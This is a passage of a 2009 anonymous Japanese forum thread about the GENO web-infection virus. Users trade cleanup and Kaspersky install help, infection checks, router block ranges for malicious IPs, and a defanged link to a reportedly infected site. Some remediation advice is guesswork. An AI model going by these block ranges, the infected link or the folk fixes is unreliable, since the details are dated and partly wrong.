GENOウイルススレ ★5at SEC
GENOウイルススレ ★5 - 暇つぶし2ch264:名無しさん@お腹いっぱい。
09/05/16 08:11:47
>>256
XP PRO PEN4 搭載がごろごろあるっつーの。

265:名無しさん@お腹いっぱい。
09/05/16 08:12:02
>>256
2kのなら買えるかもな

266:名無しさん@お腹いっぱい。
09/05/16 08:12:08
>>263
延々とウイルスにかかるわけですね

267:名無しさん@お腹いっぱい。
09/05/16 08:12:27
>>263
ダウンロードも違法扱いになったの知ってるか?

268:名無しさん@お腹いっぱい。
09/05/16 08:12:36
>>264
本体だけ?ノート?
本当に8000円でXPインストール済み?

269:名無しさん@お腹いっぱい。
09/05/16 08:14:25
>>263
セキュ板で割れ宣言するヤツがいるなんて・・・

270:名無しさん@お腹いっぱい。
09/05/16 08:14:51
>>268
この店安いから探してみ

URLリンク(www.geno-web.jp)

271:名無しさん@お腹いっぱい。
09/05/16 08:14:53
>>268
スリムタワーが多いかな5000円ぐらいからが多い
ノートだと10000円からかな

272:94 101 154
09/05/16 08:15:01
>>250
じつは同じヤツだと思うよ。
そのPCでクレジットカード使ってみろって話。
それが嫌で、危険だと分かるなら、ネットにつなぐなって、そう思うよな。

>>261
多分、ディレクトリに日本語が混ざっている。
ドライブのルートでやってみれ。

>>228
そのサイトの人は、そう書いているね。
IE7以前だと、そう(ヤバイ)みたいだね。
IE8では対策されているみたい。

いずれにしても、これまでにあがったような対策をしなきゃならん。

273:214
09/05/16 08:15:01
>>261
最初インストールする時にセットアップするファイルを解凍してできるのがkis8フォルダで
インストール先は変えてなければC:\Program Files\Kaspersky Labです

インストールができたらkis8フォルダはもう要らないので捨てていいよ

274:名無しさん@お腹いっぱい。
09/05/16 08:15:18
>>263は釣りだろ
こやつめははは

275:名無しさん@お腹いっぱい。
09/05/16 08:15:34
>>270
らめぇえぇぇっぇぇえ

276:名無しさん@お腹いっぱい。
09/05/16 08:16:15
>>270
>>268じゃないけどありがとうw

277:名無しさん@お腹いっぱい。
09/05/16 08:16:43
>>270
URLリンク(www.geno-web.jp)

本当に、安いね


278:名無しさん@お腹いっぱい。
09/05/16 08:16:44
>>263
残念 (^^;

279:名無しさん@お腹いっぱい。
09/05/16 08:18:27
GenoウイルスのスレでGenoのサイト勧めるとかww

280:名無しさん@お腹いっぱい。
09/05/16 08:18:34
>>268
デスクトップは本体だけで8000円
15モニタ付きなら12000円
ノートなら2万
どれも4年から5年落ち
初心者はリカバリCD付き買いなよ。

281:名無しさん@お腹いっぱい。
09/05/16 08:19:17
★3まで超マッタリだったのに一昨日からのこの加速ぶりはなんなんだ・・・

282:名無しさん@お腹いっぱい。
09/05/16 08:19:19
ウイルス入りだから安いんだろ

283:名無しさん@お腹いっぱい。
09/05/16 08:20:25
何このGENOマッチポンプ商法

284:名無しさん@お腹いっぱい。
09/05/16 08:20:46
URLリンク(www.geno-web.jp)
【良品中古】 DELL OPTIPLEX GX60 [OPTIPLEX GX60]
(Cel 2.40GHz/ 512MB/ 40GB/ DVD-ROM/ WinXP ProリカバリCD付き)

[販売価格] 7,999 円
これで良いじゃん

285:名無しさん@お腹いっぱい。
09/05/16 08:20:55
>>281
同人板の腐女子連中が流入してきた

286:名無しさん@お腹いっぱい。
09/05/16 08:20:57
安物買いの銭失いになりかねんわ

287:名無しさん@お腹いっぱい。
09/05/16 08:21:20
>>281
同人スレから流れてきてるんじゃね

288:名無しさん@お腹いっぱい。
09/05/16 08:21:43
>>284
ウイルスもプリインストールされてるんだろ?

289:名無しさん@お腹いっぱい。
09/05/16 08:22:30
>>268
使い捨てPCっていいぞ。

290:名無しさん@お腹いっぱい。
09/05/16 08:22:56
そういやアンチウィルスソフトも安売りしてたよね

291:名無しさん@お腹いっぱい。
09/05/16 08:24:36
>>284
企業の払い下げとはいえ、十分使えるスペックのマシンがゴミのような値段とは、恐ろしい世の中だ

292:名無しさん@お腹いっぱい。
09/05/16 08:25:48
次スレいらないね

293:94 101 154
09/05/16 08:26:10
URLリンク(www.itmedia.co.jp)
偽フラッシュのインストールを促すらしいぞ。
みんな気をつけろよ。

294:名無しさん@お腹いっぱい。
09/05/16 08:26:23
>>284
このPCショップは信用できるのか?
HPにウイルス仕込まれているようなところだろ?

やっぱ、買うならソフマップとかで買いたいわ
アフターケアも何も無いような弱小の中古PC屋だと
使い捨てのサブPCなら良いけど、メインとして使うには怖い

295:名無しさん@お腹いっぱい。
09/05/16 08:26:56
>>272
すみませんドライブからルート検索するってどうやるんですか。

>>273
ファイル名を指定して実行したらたくさんファイルが出てきたんですが、
カスペらしき名前のファイルが見当たりませんでした。
どんな名前かとかわからないでしょうか。

296:名無しさん@お腹いっぱい。
09/05/16 08:27:01
見積りとかはVIPでやれよ
ここはセキュリティ板

297:名無しさん@お腹いっぱい。
09/05/16 08:27:02
GENOのURL貼るなw
心臓がどっきんこ言っただろw

298:名無しさん@お腹いっぱい。
09/05/16 08:28:11
やっぱ、「GENOウイルス」って名称は
中古PCショップの「GENO」が発祥だから?

299:名無しさん@お腹いっぱい。
09/05/16 08:28:25
>>294
ソフマップはまともな買取してないからハズレ率が高いよ

300:名無しさん@お腹いっぱい。
09/05/16 08:29:32
>>298
YES

301:名無しさん@お腹いっぱい。
09/05/16 08:30:01
>>299
でも、すぐに潰れるってことは無さそうだし、一応、アフターケアもしているじゃん
困った時に、電話で質問できるってのは大きいよ

ソフマップ以上に信用できる大手の中古PCショップってあるか?

302:名無しさん@お腹いっぱい。
09/05/16 08:30:03
>>295
画面の右下のカスペアイコン右クリックでスキャンとか設定とか

カスペアイコンある? ちゃんとインストール出来てるのかな?

303:名無しさん@お腹いっぱい。
09/05/16 08:30:17
>>293
これ見て、逆にAdobeのアップデータも入れていいのか混乱する人出そうだなw

304:名無しさん@お腹いっぱい。
09/05/16 08:30:38
>>94
勉強になるなぁ

305:名無しさん@お腹いっぱい。
09/05/16 08:31:02
>>298
GENOの対応があまりにもすばらしかったから、それに敬意を表して
GENOウイルスと呼ぶようになった

306:名無しさん@お腹いっぱい。
09/05/16 08:31:55
>>295
あとエクスプローラでファイルやフォルダやドライブを右クリで
カスペマークのスキャン

307:名無しさん@お腹いっぱい。
09/05/16 08:32:02
>>94
>本当に必要なファイルはVirusTotalにかけて、
>それ以外の99パーセントのファイルは、一応スキャンした後で、外付けHDDとかに退避がおすすめ。
>そしてしばらく凍結。
>今は完全に 悪意の攻撃者 >>>>>>>>>>>>>>>>>>>>>>>セキュリティーベンダー
>だから、1ヶ月(いや、最悪半年か?)くらい、不要ファイルは寝かせて、
>セキュリティーベンダーのウィルス特定精度があがってきた頃に、外付けHDDの中を再スキャン。
>その時は、マカフィー、ノートン、G-Data Kaspersky など複数ソフトで検索した方がいいよ。



勉強になるなぁ

308:名無しさん@お腹いっぱい。
09/05/16 08:33:40
>>298
実際、どっかのセキュリティベンダーが、
その初代ウィルスをGENOなんとかって命名してる

309:名無しさん@お腹いっぱい。
09/05/16 08:33:54
ところで、外付けHDDに全ファイルを対比させたとして、
後でUSBでクリーンインストール後のPCに接続した時に、
外付けHDDに潜んでいるウイルスがクリーンなPC本体に入り込む危険は無いの?

310:名無しさん@お腹いっぱい。
09/05/16 08:35:06
>>309
危険は有る

311:272
09/05/16 08:35:20
>>295
ごめん。
そういう意味じゃなくって、
setup.exeの親フォルダはkis8なんでしょ?
そのまた親フォルダか爺さんフォルダか、ひい爺さんフォルダに日本語を含んでない?
例えば、Dドライブ直下に半角英数でKIS8ってフォルダを作って、そこにKIS8の全ファイルを移動してWクリックで
セットアップが起動しないか試してみて。

312:名無しさん@お腹いっぱい。
09/05/16 08:35:30
現状は知らないけど同人板はウイルスが原因で爆撃されて被害に遭ってたよな。
P2Pは関係なくてロダに上がってるファイルから感染してる場合が多いのも特徴だった。

313:名無しさん@お腹いっぱい。
09/05/16 08:35:34
629 :GENO:2009/05/16(土) 07:04:38 ID:SvPTTP+Z0
GENO(ジェノ)ウイルス。
まさにGENOCIDE(集団虐殺)

誰がうまいこと言えと。まぁ俺なんですけどね。

314:名無しさん@お腹いっぱい。
09/05/16 08:35:35
Virtual BoxにUbuntu入れて
それでネットやるか

315:名無しさん@お腹いっぱい。
09/05/16 08:36:22
google charmは今のところ閲覧問題なし?

316:名無しさん@お腹いっぱい。
09/05/16 08:37:12
>>284
開いちゃったんだが大丈夫だよな…?

317:名無しさん@お腹いっぱい。
09/05/16 08:37:22
GENOのおかげで日本中に広まったんだから
敬意を表してGENOウイルスと呼んでやろうぜ

318:名無しさん@お腹いっぱい。
09/05/16 08:37:45
ああカスペをインストールできてないみたいなのか

319:名無しさん@お腹いっぱい。
09/05/16 08:37:46
同人板の連中なんてhtmlも使えない奴ばっかだろ
何言っても無駄

320:名無しさん@お腹いっぱい。
09/05/16 08:37:53
>>302
デスクトップにはkis8って名前のフォルダとkis8.0.0.454.jptaって名前のアイコンがあります。
kis8.0.0.454.jptaのアイコンを右クリックすると開くは出るんですがスキャンは透明でクリックできません。
開いて実行を選択するとC:\Documents and Settings\as\デスクトップ\と出ます、
解凍をクリックすると既に同名のファイルが存在しますと出ます。

>>273さんが教えてくれたC:\Program Files\Kaspersky Labを入力して実行してみたら
インストールの画面が出たんですが、この画面は何度もでてインストールはしたはずなんですが、
やってみたほうがいいでしょうか。

321:名無しさん@お腹いっぱい。
09/05/16 08:38:16
>>316
あなたの危機感がアウトー

322:名無しさん@お腹いっぱい。
09/05/16 08:38:18
>>316
大丈夫ですよ^^

って言ってもらえば満足か?

323:名無しさん@お腹いっぱい。
09/05/16 08:38:27
>>312
それもあるだろうけど
個人でサイト持ってる率が他より多いからじゃね?
FTPでうpする際に撒くと

324:名無しさん@お腹いっぱい。
09/05/16 08:38:58
>>316
感染した可能性はありますん

325:名無しさん@お腹いっぱい。
09/05/16 08:41:53
>>310
じゃあ、一旦、外付けHDDに内容を退避して
OS再インストール後のクリーンPCに戻すことは出来ないの?

USBで接続した瞬間にウイルスが入り込んでくる?

326:名無しさん@お腹いっぱい。
09/05/16 08:42:02
>>320
>>272じゃないけど、フォルダのパスに「デスクトップ」っていう日本語が入ってるからアウトなんじゃない
つまりは、ドライブルートに入れて(つまりマイコンピュータ開いてCドライブ直下にフォルダを移動して)実行すればいけると思う

327:名無しさん@お腹いっぱい。
09/05/16 08:42:27
>>320
同名のファイルが存在しますと出るのはもうすでにkis8フォルダがあるから
一度kis8フォルダを削除してkis8.0.0.454.jptaを>>311さんの言うとおり
D:\とかC:\に移動してからダブルクリックでインストールして

328:94 101 154
09/05/16 08:44:17
>>313
ひそかにうまいと思っていた。

>>295
はカスペインストールできてないと思うんだよ。 
解凍しただけだから、setup.exeを起動してインストールさせようとしているんじゃないの?

そう思って>>311 を書いた。
>>320
インストールできていない。
プログラムの追加と削除で確認してみな。
インストールできていたら、セットアップ画面でポリシーと尋ねられるから、そこで迷うはず。
すでに通過したとは思えない。

>>316
トップしかみてないけど、トップは大丈夫くさい。
スクリプトはGeno関連のgoogleだけで、いつもと同じ。

329:名無しさん@お腹いっぱい。
09/05/16 08:45:41
インストール終わったらkis8フォルダ入れないので削除ね

330:名無しさん@お腹いっぱい。
09/05/16 08:46:28
訂正
インストール終わったらkis8フォルダ要らないので削除ね

331:名無しさん@お腹いっぱい。
09/05/16 08:46:42
>>325
とりあえずなんのために時間を置くのか解っているのか

332:名無しさん@お腹いっぱい。
09/05/16 08:48:32
>>284のサイトを開いたがVistaだから問題ないな

333:名無しさん@お腹いっぱい。
09/05/16 08:49:16
Skypeとかメッセンジャーは感染元になったりすることはあるんでしょうか

334:名無しさん@お腹いっぱい。
09/05/16 08:50:21
>>333
他のウイルスならある

335:名無しさん@お腹いっぱい。
09/05/16 08:52:30
仕方ないから貯めた画像だけでチンコしごくか
ひさじぶりに見た画像が妙にエロくて右手が止まらないwwwwwwwwwwwwwwwwwwwwwwwwww

336:名無しさん@お腹いっぱい。
09/05/16 08:53:10
>>334
回答有難うございます


337:名無しさん@お腹いっぱい。
09/05/16 08:53:14
>>335
楽しそうだなwwwwwwww

338:名無しさん@お腹いっぱい。
09/05/16 08:53:34
>>333
URLリンク(www.yomiuri.co.jp)

339:名無しさん@お腹いっぱい。
09/05/16 08:53:45
同人板へお帰りください><;

340:名無しさん@お腹いっぱい。
09/05/16 08:56:15
同人板でデフォルト名無しで書いてるのはこっちから流れてった人か?
デフォ名無しは各自あぼーん対象だぞあそこは

341:94 101 154
09/05/16 08:56:21
>>325
時間おけば、セキュリティーソフトが対応してくるだろうけど、
USBの自動再生はきっておいた方がいい。

URLリンク(support.microsoft.com)
URLリンク(www.atmarkit.co.jp)
URLリンク(blogs.technet.com)
MSがヘマやらかしてるから、情報が交錯していて結構面倒。

うるおぼえだけど、マイクロソフトがXPにおけるUSBの自動再生は無効にする予定だった気がする。

342:名無しさん@お腹いっぱい。
09/05/16 08:57:38
>>335
うおい!なんかイカくせーぞw

343:名無しさん@お腹いっぱい。
09/05/16 08:58:45
USBの自動再生なんぞ
Shell Hardware Detection
っていうサービスとめればすぐとまるだろ

344:名無しさん@お腹いっぱい。
09/05/16 08:59:52
Vistaでも感染するんじゃない?

ieがアドビの更新頻繁に求めて来たぞ


345:名無しさん@お腹いっぱい。
09/05/16 09:00:09
 他人の不幸で今日も飯がうまい!!
    +        ____    +
      +   /⌒  ⌒\ +
   キタ━━//・\ ./・\\━━!!!!
    +   /::::::⌒(__人__)⌒:::::\  +
        |  ┬   トェェェイ     |
     +  \│   `ー'´     /    +
     _|\∧∧∧MMMM∧∧∧/|_
     >                  <
   /  ─ /  /_ ─┐ヽ|  |ヽ  ム ヒ | |
 \/  ─ / / ̄ /   /  | ̄| ̄ 月 ヒ | |
  ノ\ __ノ   _ノ   \   / | ノ \ ノ L_い o o

346:名無しさん@お腹いっぱい。
09/05/16 09:00:21
>>344
感染する

347:名無しさん@お腹いっぱい。
09/05/16 09:01:07
>>345
そう言いながら実はウイルス飼ってるんですよねw

348:名無しさん@お腹いっぱい。
09/05/16 09:03:22
>>306
>>320
>>326
>>327
>>311
レス遅くてすみません。
Cドライブに移して実行したらインストール画面が出てきました。
インストールをクリックすると既に同じバージョンの製品がインストールされてます。上書きインストールを始めますかとでます。
続けても平気でしょうか?

349:名無しさん@お腹いっぱい。
09/05/16 09:05:09
いまさらな質問で悪いんだが、同人サイトが感染ってことはその各管理人がロガーでパス抜かれてサイト編集されたってこと?
だとしたらキーロガーとしてもそうとう恐いウイルスって認識していいの?
流れに乗り遅れていまひとつよくわからん

350:344
09/05/16 09:06:16
〉〉346

把握

351:名無しさん@お腹いっぱい。
09/05/16 09:06:48
そういえばこの間、Adobe Readerのアップデートしやがれって連絡が何度もきてたっけ
これが原因か

352:名無しさん@お腹いっぱい。
09/05/16 09:07:35
>>349
うpする時にファイルにコード書き込むんじゃないっけ?

353:332
09/05/16 09:07:43
>>344
えっ!?

354:名無しさん@お腹いっぱい。
09/05/16 09:09:01
何なのこの勢いw

355:名無しさん@お腹いっぱい。
09/05/16 09:09:14
今ルーターの設定をやっているのだが、拒否するIPアドレスは94.247.0.0/16でOKですか?

356:名無しさん@お腹いっぱい。
09/05/16 09:09:28
>>348
わけわからなくなってるようなのでプログラムの追加と削除で一度アンインストールして
初めからやり直すのがいいんじゃないかな

357:名無しさん@お腹いっぱい。
09/05/16 09:09:56
>>349,352
両方だな感染したままだとうp時にうp先にも繁殖
PC側をクリーンにしてもPWがキーローガーで流れててれば改竄さえる危険が有る

358:名無しさん@お腹いっぱい。
09/05/16 09:10:00
語尾にwを付けたがる奴は同一人物か?
同人板に帰れよ

359:名無しさん@お腹いっぱい。
09/05/16 09:10:39
うほっ、今更ながらcmdとregedit立ち上げを試してみたがどっちも立ち上がった
MD5改変もない、Adobeのリーダーは削除したがフラッシュプレイヤーは10.22.87(?)と確か最新
感染したかもと恐怖したがどうやら大丈夫そうだな・・・
ただ同人サイトの巡回は当分無理だな、しょうがないとはいえ

360:名無しさん@お腹いっぱい。
09/05/16 09:11:03
kis8フォルダも削除ね

361:名無しさん@お腹いっぱい。
09/05/16 09:16:37
まあちゃん♪

362:名無しさん@お腹いっぱい。
09/05/16 09:17:35
>>356
試しにインストールクリックしたら
「インストールのログファイルを開くときにエラーが発生しました。
指定されたログ、ファイルが存在し書き込み可能であるか確認してください」とでてしまいました。

アンインストールしてみます。

363:名無しさん@お腹いっぱい。
09/05/16 09:17:50
そんなあなたにLinux
USBメモリからも起動できて同人サイトの巡回もウマウマ

364:名無しさん@お腹いっぱい。
09/05/16 09:18:28
>>355
他にもあるみたい

365:名無しさん@お腹いっぱい。
09/05/16 09:19:09
>>349
キーロガーじゃ無い事に注意

366:名無しさん@お腹いっぱい。
09/05/16 09:21:47
>>355
厳密に94.247.[2-3].[0-255]だけを弾きたいなら、94.247.2.0/23でもいいんじゃない
俺はFWには94.247.0.0/16で登録してるけど

367:名無しさん@お腹いっぱい。
09/05/16 09:22:13
>>341
USBで接続された外付けHDDの自動再生、つまり「プラグ・アンド・プレイ」のこと?

自動で中身を読み込まなければ、USB接続して外付けHDDの中身をavastとかでチェックかけて
何も出てこなければPC内部のHDDにコピーしてもOK?

368:名無しさん@お腹いっぱい。
09/05/16 09:23:29
>>355
それはちょっと前のZlkonだね。
今は、94.229.65.160/27が必要。

369:名無しさん@お腹いっぱい。
09/05/16 09:25:04
MS、Autorunを正しく無効化するための更新プログラムを公開

370:名無しさん@お腹いっぱい。
09/05/16 09:25:08
>>1に載っているサイトさん(atword.jp/gnome)の最新記事、
矛盾しているように見えるのですが、もし感染していた場合、
サイトのクリーンアップとローカルのクリーンアップどちらを優先するべきですか?



以下のふたつの文章です
--------------------------------------------------------------
>附記的な注意になりますが、すべてのイメージファイルをバックアップから再アップロードしてください。
>※注意:先に全サイト内の全部のディレクトリからすべてのファイルを消す必要があります。

--------------------------------------------------------------
>絶対に感染したPCで感染したサイトのクリーンアップを行わないでください。
>貴方はまず先に、感染しているかもしれないローカルなPCのクリーンアップから開始しなければなりません。

371:名無しさん@お腹いっぱい。
09/05/16 09:26:32
URLリンク(www29.atwiki.jp)
94.247.2.195(94.247.[2-3].[0-255])への接続を遮断


この情報は古い

372:名無しさん@お腹いっぱい。
09/05/16 09:26:57
>>370
まずは自分のPCをきれいにしてください。

373:名無しさん@お腹いっぱい。
09/05/16 09:27:43
クリーンアップ (Clean up) とは野球に於いて、塁の上にいる走者を生還させることが期待される打順のことである。

374:名無しさん@お腹いっぱい。
09/05/16 09:29:28
ここの>>2見てAdobe Readerってダメなのかと思ってAdobe Acrobat Readerググったら有料かよ
大人しくAdobe Readerでチェックボックス外すか
それにしても、カズペが落ち目だからノートン乗り換えようと思ったら、そのノートンがGENOには残念対応とか・・


375:名無しさん@お腹いっぱい。
09/05/16 09:30:47
>>368
もう94.0.0.0/8とかでいいよww

376:名無しさん@お腹いっぱい。
09/05/16 09:32:25
テンプレにこれ入ってないな

PeerGuardian 33
スレリンク(download板)

377:名無しさん@お腹いっぱい。
09/05/16 09:33:21
>>371
いまはどうなってんの?

378:名無しさん@お腹いっぱい。
09/05/16 09:33:55
>>373
なるほど、だから「走者一掃の満塁ホームラン」などと言われるのか。

379:名無しさん@お腹いっぱい。
09/05/16 09:34:00
もしサイトがもう感染してたらファイル消した方がいいんだよな?

380:名無しさん@お腹いっぱい。
09/05/16 09:34:04
>>355
URLリンク(www.rupan.net)
URLリンク(www1.axfc.net)

サイダーなら下の方がいいね

381:名無しさん@お腹いっぱい。
09/05/16 09:35:52
ん?
Acrobat Readerの改名がAdobe Readerだよね?

382:名無しさん@お腹いっぱい。
09/05/16 09:36:50
戒名な

383:名無しさん@お腹いっぱい。
09/05/16 09:38:19
不安なやつは、再インストール。

これが鉄板。

384:名無しさん@お腹いっぱい。
09/05/16 09:38:24
>>379
自分のPCを綺麗にする→サイトを綺麗にする の順。
出来れば自分のPCをきれいにした後FTP Password変更

汚染されたPCからサイトのファイルを操作してもいたちごっこ。

385:名無しさん@お腹いっぱい。
09/05/16 09:38:44
>>284
吹いたwwwおっめーふざけんなお

noscriptさんとavastくんに警護されてるから屁でもないぜ

386:名無しさん@お腹いっぱい。
09/05/16 09:42:01
>384
汚染されたPCからでも既にファイル改竄されてしまってるなら
全部消した方がいいんじゃないの?見た人感染するから
ファイル改竄がまだならアクセスしたらまずいんだろうけど

387:名無しさん@お腹いっぱい。
09/05/16 09:44:33
まとめサイトがおかしいという話をきいたが

388:名無しさん@お腹いっぱい。
09/05/16 09:44:50
>>380
40箇所以上もあるのか。
うちのルーターは最大で32箇所なのだがorz

389:名無しさん@お腹いっぱい。
09/05/16 09:46:04
え、3時間前と変わってない気がする>まとめサイト

どこがおかしいのか指摘plz

390:名無しさん@お腹いっぱい。
09/05/16 09:47:25
>>386

>>379は既にサイトが感染した場合を想定している。
早急に汚染を拡大させない*だけ*の目的なら、自身のWeb用htmlファイル全削除後に
サイトのファイル全消去。
だろうけれど、復旧にどれくらい時間がかかるかな。


391:名無しさん@お腹いっぱい。
09/05/16 09:48:16
おとといまで保守気味に書き込んでたのに
ここ2日で一気に進行加速しててワロタ

やっと認知されてきたのに、対応法は進化してないのがガクガク(((( ;゚Д゚))))ブルブル

392:名無しさん@お腹いっぱい。
09/05/16 09:48:35
>>387
同人サイト向けWiki


393:名無しさん@お腹いっぱい。
09/05/16 09:48:37
>>388
そんなに無理ww

394:名無しさん@お腹いっぱい。
09/05/16 09:48:48
カスペインストール失敗した者なんですけど、一度アンインストールしました。
もう一回インストールするときに気をつけたほうが良いこととかあったら助言お願いします。

395:名無しさん@お腹いっぱい。
09/05/16 09:49:01
693 geno New! 2009/05/16(土) 09:34:37 ID:lv1QsSrS0
今急いでチェックしてきた。これは怖い
サイトの日記でも注意喚起して来た方がいいね

あと同人向けまとめWikiのGENOウィルスまとめへのリンクが
違うサイトになっててビビったから報告


694 GENO sage New! 2009/05/16(土) 09:37:15 ID:oOSNfhyI0
>>255の、まとめサイトへのリンクが変なんだが…
関係ないページに飛ばされる。ちなみに飛んだ先でnoscriptがjs4個ブロックした

396:名無しさん@お腹いっぱい。
09/05/16 09:50:29
誰かに弄られたんだな

397:名無しさん@お腹いっぱい。
09/05/16 09:50:51
Avira、対応したな
過信は禁物だが

Engine Update AV8/9 8.02.00.168 / AV7 7.09.00.168 (2009-05-15)
- Updated: PDF exploit detection
HTML/Shellcode.Gen

398:名無しさん@お腹いっぱい。
09/05/16 09:52:07
>>397
有志が毎日報告してくれてるけど、その時点ではスルーも多いから
本当に油断禁物

399:前スレ77
09/05/16 09:53:01
>>388
でも、まだ増え続けてるよ

400:名無しさん@お腹いっぱい。
09/05/16 09:53:06
いや>379も>386も自分です

PCだけウィルス感染してる場合はすぐクリーンインスコ&パス変更で、
PCもサイトも感染済みの場合は、もうパス抜かれてるんだから
感染拡大防止に鯖のファイルまず全部消した方がいいんじゃないのかと思ったのです

401:名無しさん@お腹いっぱい。
09/05/16 09:53:30
>>394
前回のインストール用のkis8フォルダが残ってないかチェック

402:名無しさん@お腹いっぱい。
09/05/16 09:54:45
>>391
Vista機の購入で解決。
間違っても、安易にXPからVistaにアップしないこと。

403:名無しさん@お腹いっぱい。
09/05/16 09:56:19
Vistaでも感染してる人がいるらしいじゃない?

404:名無しさん@お腹いっぱい。
09/05/16 09:59:58
hXXp://www.zengozen.co.jp/
も感染確認

405:名無しさん@お腹いっぱい。
09/05/16 10:00:03
システムドライブ以外のドライブのデータファイルも改竄されたりするの?

406:名無しさん@お腹いっぱい。
09/05/16 10:01:53
>>401
ありがとうございます、消せました。
あと最初にカスペのサイト開いた時はまとめwikiのリンクから行ったんですが
wikiおかしくなってるんですよね。
検索かけたいんですがカスペって何て正式名称何だったでしょうか。

407:名無しさん@お腹いっぱい。
09/05/16 10:04:23
>>404
GJ 踏んできま~す

408:名無しさん@お腹いっぱい。
09/05/16 10:04:39
>>406
カスペでぐぐればカスペルスキーがでてくるだろ。
どこまで教えてちゃんなんだよ・・・

409:名無しさん@お腹いっぱい。
09/05/16 10:04:50
vista感染した奴は挙手!
uac切ってた?

410:名無しさん@お腹いっぱい。
09/05/16 10:04:57
カスペルスキー

411:名無しさん@お腹いっぱい。
09/05/16 10:06:45
>>406
Kaspersky (カスペルスキー)

ジャストシステムのとこでいいのかな?
URLリンク(www.just-kaspersky.jp)

一応カスペWiki
URLリンク(kaspe.2chv.net)

412:名無しさん@お腹いっぱい。
09/05/16 10:06:48
>>404
ヤバッ!埋め込まれている!


413:名無しさん@お腹いっぱい。
09/05/16 10:08:35
>>404
>>31
あほ?

414:名無しさん@お腹いっぱい。
09/05/16 10:09:15
なんだいw載ってたやつかw

415:名無しさん@お腹いっぱい。
09/05/16 10:10:52
放置されてるな

416:名無しさん@お腹いっぱい。
09/05/16 10:11:10
4月くらいに再起動できなくなるとか言ってたけど今どうなの?
regeditなんてそうそう使わないから気付かなそう

417:名無しさん@お腹いっぱい。
09/05/16 10:11:11


切ってないけどIeがアドビの更新頻繁に求めて来た

因みにアバストで検査したけど出てこなかった

バックアップした外付け感染してんのかな…


418:名無しさん@お腹いっぱい。
09/05/16 10:14:04
>>408
すみません、先に調べるべきでした。

>>410>>411
ありがとうございます。

419:名無しさん@お腹いっぱい。
09/05/16 10:17:00
avastに乗り換えてスキャンやってるんだが
かなり時間かかるのなこれ

420:名無しさん@お腹いっぱい。
09/05/16 10:19:17
ここで出てくるavastってフリー版のやつだよね? 有料版あるのかは知らないけど
avastって他のウイルスに対してはどうなのかな?
avastって良いんだろか? avastたんがいいのは分かるんだけど

421:名無しさん@お腹いっぱい。
09/05/16 10:19:50
avastかAVGで昔迷って
AVGだったけど今回からavastになった

422:名無しさん@お腹いっぱい。
09/05/16 10:19:51
もうブラウザにpdfを表示しないみたいなオプション付けろよ

423:名無しさん@お腹いっぱい。
09/05/16 10:19:58
>>400
PCだけの感染だけならば多分そう。
ただサイトのも変更されていた場合は、アクセスし削除する前に
自身のPCのhtmlを削除し無いと消している間等で、本人が消したつもりでも
再度なにかが転送される恐れがある。

424:名無しさん@お腹いっぱい。
09/05/16 10:22:49
流れ早いお

425:名無しさん@お腹いっぱい。
09/05/16 10:22:53
カスペってKaspersky Internet Security 2009とKaspersky Anti-Virus 2009、
Kaspersky Anti-Virus for Windows Server 6.0 Home Server Editionのどれがいいんですか?

426:名無しさん@お腹いっぱい。
09/05/16 10:23:29
>>63でも出てるけど、うちもcmd.exeで実行して
「dir C:\WINDOWS\system32\sqlsodbc.chm」で
エンター押したら「ファイルが見つかりません」って出る。
XPなんだが、ファイル一体どこにいるんだ……。
それともアウアウってこと?

427:名無しさん@お腹いっぱい。
09/05/16 10:23:58
>>421
ありがとう
ここ2年くらいカスペ試用版で特にまだ感染とか無いんだけど気になって聞いてみました

428:名無しさん@お腹いっぱい。
09/05/16 10:24:25
>>426
なんで普通にエクスプローラで見ようと思わないんだよ

429:名無しさん@お腹いっぱい。
09/05/16 10:24:25
>>422
Fxならプラグインから無効化出来なかったっけ
てかお前らそもそもPDFなんて読むよむのかよ
AReaderごとアンインストール→smartpdfで良くね

430:名無しさん@お腹いっぱい。
09/05/16 10:24:35
>423
なるほど解りました
ありがとう

431:名無しさん@お腹いっぱい。
09/05/16 10:26:36
そういうときは地道に辿っていくしかないべや
Cドライブ→WINDOWS→system32
で、自分の目でsqlsodbcってファイルを探す

432:名無しさん@お腹いっぱい。
09/05/16 10:27:16
>>428
ああありがとう!それでも見られたね!
感染を自己申告したサイトを見ててすげえてんぱってた。
50KBだったのでようやく安心できたよ、有難う!

433:名無しさん@お腹いっぱい。
09/05/16 10:27:17
>>431>>426へのレス

434:名無しさん@お腹いっぱい。
09/05/16 10:27:49
このウイルスって万全な対策法がないんだよね。
それじゃクリーンインストールしたところで再感染しそう。。
しかも感染か未感染かを確実に判別する方法がないから、いつまでたっても疑心暗鬼。
めんどくさい。。

435:名無しさん@お腹いっぱい。
09/05/16 10:28:03
>>431

436:名無しさん@お腹いっぱい。
09/05/16 10:28:15
>>422
PDFをブラウザに表示ってAdobe Reader側にある

437:名無しさん@お腹いっぱい。
09/05/16 10:29:27
>>426です

>>431さんもありがとう。
てんぱりの余韻で変に安価だけ投稿してしまった。
それでは七誌に戻ります。


438:名無しさん@お腹いっぱい。
09/05/16 10:29:36
>>425
普通のPCならKaspersky Internet Security 2009

439:名無しさん@お腹いっぱい。
09/05/16 10:31:23
>>426
同人版のまとめwikiは何かが全角だとかでそのままコピペはダメらしい
同人版のスレ内にコピペが貼ってあるからそれコピペすれば普通にでてきた

440:名無しさん@お腹いっぱい。
09/05/16 10:32:46
今回ばかりは対策しないとだめだと思って
昨日の夜からはじめたらもう朝だぜ・・・

441:名無しさん@お腹いっぱい。
09/05/16 10:32:50
今回のやつとは関係ないけど

うちのavastが反応するんですが、なにこれ
りぶメールってところのサイト
URLリンク(www.livmail.com)

442:名無しさん@お腹いっぱい。
09/05/16 10:33:43
>>438
ありがとうございます!

443:名無しさん@お腹いっぱい。
09/05/16 10:34:32
ってかリブメールのトップで反応あり

444:名無しさん@お腹いっぱい。
09/05/16 10:34:54
>>441
ばっちり関係あります

445:名無しさん@お腹いっぱい。
09/05/16 10:35:15
h抜きでも飛べるから工夫して貼れっつーの

446:名無しさん@お腹いっぱい。
09/05/16 10:35:20
>>439
\ が全角だから

447:名無しさん@お腹いっぱい。
09/05/16 10:36:28
regeditはファイル名の先頭がregedの場合動作できないみたいだから
c:\windows\regedit.exeをデスクットップにでもコピーして名前変えて実行すると普通に起動できた

448:名無しさん@お腹いっぱい。
09/05/16 10:36:53
441はあぼーん依頼すべきだな

449:名無しさん@お腹いっぱい。
09/05/16 10:37:09
工夫して貼ってないとわざとやってると思われるよ
あちらこちらにわざとやってんのいるから

450:名無しさん@お腹いっぱい。
09/05/16 10:37:40
>>444
今回のウイルスですか?

>>445
